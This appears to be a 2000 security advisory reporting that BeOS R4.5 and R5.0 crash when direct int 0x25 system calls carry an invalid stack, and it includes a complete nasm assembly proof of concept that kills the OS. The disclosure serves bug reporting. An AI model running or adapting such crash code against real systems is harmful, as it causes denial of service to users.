Summary:
BeOS crashes when system call with invalid parameters is
issued.
Details:
When using direct kernel calls through int 0x25 (not
libroot.so functions) BeOS dies on most system calls with
invalid parameters/stack. Allthough Be has registered this
bug before R5.0, it is present in R5.0, and is present at
least in all R4.5.x
(http://bebugs.be.com/devbugs/detail.php3?oid=2324160).
No fix is available, it's a kernel bug.
Here's a sample assembly program that kills BeOS (nasm):
section .text
global _start
_start:
push dword msg
push dword len
push dword 1 ;stdout
mov eax,3 ;sys_write
int 0x25 ;must be a *call* to int 0x25,
;then everything goes ok; i.e.
;return address must be on the stack,
;but it is not
mov eax,0x3f ;sys_exit
int 0x25
msg db "hello",0xa
len equ $ - msg
(source and binary can be downloaded at
http://linuxassembly.org/BeDie.tgz)
References:
http://www.escribe.com/software/bedevtalk/ - BeDevTalk
archives
(Feb-Mar 2000, search for topics "assembly & BeOS", "system
calls", "system call stress testing"
http://linuxassembly.org - Linux/UNIX assembly programming
portal
Received on Apr 10 2000
Intro
